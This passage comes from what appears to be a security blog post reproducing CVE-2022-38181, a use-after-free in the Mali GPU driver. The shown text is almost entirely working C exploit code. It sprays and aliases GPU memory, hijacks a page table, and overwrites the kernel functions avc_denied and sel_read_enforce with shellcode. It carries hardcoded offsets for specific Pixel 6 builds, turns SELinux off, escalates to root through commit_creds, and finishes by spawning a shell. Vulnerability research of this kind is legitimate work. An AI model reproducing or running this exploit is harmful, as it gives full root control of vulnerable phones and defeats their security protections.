for (int i = 0; i < 0x1000/8; i++) {
uint64_t entry = this_alias[pg * 0x1000/8 + i];
if ((entry & 0x443) == 0x443) {
return pg;
}
}
}
return -1;
}

// trigger page faults so the sprayed regions and their aliases get backing pages
void fault_pages() {
int read = 0;
for (int va = 0; va < SPRAY_NUM; va++) {
uint8_t* this_va = (uint8_t*)(gpu_va[va]);
*this_va = 0;
uint8_t* this_alias = alias_regions[va];
read += *this_alias;
}
LOG("read %d\n", read);
}

void spray_mem(int fd, int group_id){
uint64_t cookies[32] = {0};
for (int j = 0; j < 32; j++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group_id << 22);
alloc.in.va_pages = SPRAY_PAGES;
alloc.in.commit_pages = 0;
mem_alloc(fd, &alloc);
cookies[j] = alloc.out.gpu_va;
}
for (int j = 0; j < 32; j++) {
void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, fd, cookies[j]);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
gpu_va[j] = (uint64_t)region;
}
for (int j = 32; j < 64; j++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group_id << 22);
alloc.in.va_pages = SPRAY_PAGES;
alloc.in.commit_pages = 0;
mem_alloc(fd, &alloc);
cookies[j - 32] = alloc.out.gpu_va;
}
for (int j = 32; j < 64; j++) {
void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, fd, cookies[j - 32]);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
gpu_va[j] = (uint64_t)region;
}
}

uint64_t alias_sprayed_regions(int mali_fd) {
union kbase_ioctl_mem_alias alias = {0};
alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
alias.in.stride = SPRAY_PAGES;

alias.in.nents = SPRAY_NUM;
struct base_mem_aliasing_info ai[SPRAY_NUM];
for (int i = 0; i < SPRAY_NUM; i++){
ai[i].handle.basep.handle = gpu_va[i];
ai[i].length = SPRAY_PAGES;
ai[i].offset = 0;
}
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
mem_alias(mali_fd, &alias);

uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap alias failed");
}
alias_regions[0] = region;
for (int i = 1; i < SPRAY_NUM; i++) {
void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
if (this_region == MAP_FAILED) {
err(1, "mmap alias failed %d\n", i);
}
alias_regions[i] = this_region;
}
return (uint64_t)region;
}

//=========================== SHELLCODE AREA BEGIN =====================================
#define PAGE_SHIFT 12

#define KERNEL_BASE 0x80000000

#define OVERWRITE_INDEX 256

#define ADRP_INIT_INDEX 0

#define ADD_INIT_INDEX 1

#define ADRP_COMMIT_INDEX 2

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c

#define AVC_DENY_2207 0x927664

#define SEL_READ_ENFORCE_2207 0x93bf5c

#define INIT_CRED_2207 0x29e07f0

#define COMMIT_CREDS_2207 0x18629c

#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0

#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c

#define AVC_DENY_2211 0x8d6810

#define SEL_READ_ENFORCE_2211 0x8ea124

#define INIT_CRED_2211 0x2fd1388

#define COMMIT_CREDS_2211 0x17ada4

#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388

#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4

#define AVC_DENY_2212 0x8ba710

#define SEL_READ_ENFORCE_2212 0x8cdfd4

#define INIT_CRED_2212 0x2fd1418

#define COMMIT_CREDS_2212 0x177ee4

#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418

#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4


static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207;

static uint64_t avc_deny = AVC_DENY_2207;

/*
Overwriting SELinux to permissive
strb wzr, [x0]
mov x0, #0
ret
*/
static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};

static uint32_t root_code[8] = {0};
uint32_t lo32(uint64_t x) {
return x & 0xffffffff;
}

uint32_t hi32(uint64_t x) {
return x >> 32;
}

uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
uint64_t pc_page = pc >> 12;
uint64_t label_page = label >> 12;
int64_t offset = (label_page - pc_page) << 12;
int64_t immhi_mask = 0xffffe0;
int64_t immhi = offset >> 14;
int32_t immlo = (offset >> 12) & 0x3;
uint32_t adpr = rd & 0x1f;
adpr |= (1 << 28);
adpr |= (1 << 31); //op
adpr |= immlo << 29;
adpr |= (immhi_mask & (immhi << 5));
return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;
//Sets x8 to commit_creds
root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
root_code[ADD_COMMIT_INDEX] = add_commit;
root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
root_code[5] = 0xd63f0100; // blr x8
root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
root_code[7] = 0xd65f03c0; // ret
}

uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
pfn |= 0x100UL;
return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
uint64_t vpfn = addr >> PAGE_SHIFT;
vpfn >>= (3 - level) * 9;
return vpfn & 0x1FF;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
struct MALI_JOB_HEADER jh = {0};
jh.is_64b = true;
jh.type = MALI_JOB_TYPE_WRITE_VALUE;

struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
payload.type = type;
payload.immediate_value = value;
payload.address = gpu_addr;

MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
uint32_t* section = (uint32_t*)jc_region;
struct base_jd_atom_v2 atom = {0};
atom.jc = (uint64_t)jc_region;
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_CS;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
usleep(10000);
}

void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
uint64_t curr_overwrite_addr = 0;
for (int i = 0; i < size; i++) {
uint64_t base = reserved[i];
uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
uint64_t start_idx = compute_pt_index(base, 3);
uint64_t end_idx = compute_pt_index(end, 3);
for (uint64_t addr = base; addr < end; addr += 0x1000) {
uint64_t overwrite_addr = set_addr_lv3(addr);
if (curr_overwrite_addr != overwrite_addr) {
LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
curr_overwrite_addr = overwrite_addr;
for (int code = code_size - 1; code >= 0; code--) {
write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
}
usleep(300000);
}
}
}
}

int run_enforce() {
char result = '2';
sleep(3);
int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
read(enforce_fd, &result, 1);
close(enforce_fd);
LOG("result %d\n", result);
return result;
}

void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
LOG("fingerprint: %s\n", fingerprint);
if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
avc_deny = AVC_DENY_2108;
sel_read_enforce = SEL_READ_ENFORCE_2108;
fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
avc_deny = AVC_DENY_2201;
sel_read_enforce = SEL_READ_ENFORCE_2201;
fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
avc_deny = AVC_DENY_2202;
sel_read_enforce = SEL_READ_ENFORCE_2202;
fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
avc_deny = AVC_DENY_2207;
sel_read_enforce = SEL_READ_ENFORCE_2207;
fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
avc_deny = AVC_DENY_2211;
sel_read_enforce = SEL_READ_ENFORCE_2211;
fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
avc_deny = AVC_DENY_2212;
sel_read_enforce = SEL_READ_ENFORCE_2212;
fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
return;
}

err(1, "unable to match build id\n");
}

void cleanup(int mali_fd, uint64_t pgd) {
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}

void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);

usleep(100000);
//Go through the reserve pages addresses to write to avc_denied with our own shellcode
write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));

//Triggers avc_denied to disable SELinux
open("/dev/kmsg", O_RDONLY);

uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);

//Call commit_creds to overwrite process credentials to gain root
write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
}
//=========================== SHELLCODE AREA END ==================================

int trigger(int mali_fd, int mali_fd2, int* flush_idx){
void* gpa_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, SPRAY_PAGES, (uint64_t)gpa_alloc_addr);
atom_number++;
print_addr("jit_addr", jit_addr);

printf("[*] put jit_reg into evicted_list\n");
//put jit_node --> evicted_list
mem_flags_change(mali_fd, jit_addr, BASE_MEM_DONT_NEED, 0);

for (int i = 0; i < 100; i++){
union kbase_ioctl_mem_query query= {0};
query.in.gpu_addr = jit_addr;
query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;

// printf("[*] trying to construct memory pressure to trigger shrinker\n");
flush_regions[i] = flush(0, i + *flush_idx);
if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0){
migrate_to_cpu(0);
LOG("[*] jit_reg has been released by shrinker\n");
spray_mem(mali_fd, 1);

for (int j = 0; j < SPRAY_NUM; j++){
mem_commit(mali_fd,
gpu_va[j], SPRAY_PAGES);
}

LOG("[*] alias all the sprayed regions\n");
uint64_t alias_region_spray = alias_sprayed_regions(mali_fd);
print_addr("alias_region_spray", alias_region_spray);
fault_pages();

for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);

LOG("[*] make full of mem_pool\n");
uint64_t drain = drain_mem_pool(mali_fd);
release_mem_pool(mali_fd, drain);

LOG("[*] free jit_reg into next_pool\n");
jit_free(mali_fd, atom_number, jit_id);

LOG("[*] spray pgd\n");
map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &reserved[0]);

int freed_idx = find_freed_idx(mali_fd);
if (freed_idx == -1) err(1, "Failed to find freed_idx");
LOG("Found freed_idx %d\n", freed_idx);
int pgd_idx = find_pgd(freed_idx, 0);
if (pgd_idx == -1) err(1, "Failed to find pgd");
uint64_t pgd = alias_region_spray + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
atom_number++;

write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
run_enforce();
cleanup(mali_fd, pgd);
return 0;
}
// printf("[+] jit commit_size == %llu\n", query.out.value);
}
LOG("[!] fail exploit and retry...\n");
*flush_idx += 100;
jit_id++;
return -1;
}
int main(){
setbuf(stdout, NULL);
setbuf(stderr, NULL);

//set target
select_offset();

// initial mali_fd
mali_fd = open_dev(MALI_PATH);
mali_fd2 = open_dev(MALI_PATH);
setup_mali(mali_fd, 0);
setup_mali(mali_fd2, 1);
setup_tracking_page(mali_fd);
setup_tracking_page(mali_fd2);

//set trim_level = 100 so that kbase_jit_free trims the backing down to initial_commit (maximum shrink)
LOG("[*] jit_reg init\n");
jit_init(mali_fd, 0x100, 100, 0);

// prepare reserved pages to alloc pgd from next_pool
reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE / RESERVED_SIZE, &reserved[0], 1);

printf("[+] reserved[0] == 0x%lx\n", reserved[0]);

int flush_idx = 0;
for (int i = 0; i < 10; i++){
if(!trigger(mali_fd, mali_fd2, &flush_idx)){
system("sh");
break;
}
}
return -1;
}
  • Title: Mali GPU CVE-2022-38181 Vulnerability Reproduction
  • Author: henry
  • Created at : 2024-12-11 20:56:30
  • Updated at : 2024-12-11 20:59:29
  • Link: https://henrymartin262.github.io/2024/12/11/CVE-2022-38181/
  • License: This work is licensed under CC BY-NC-SA 4.0.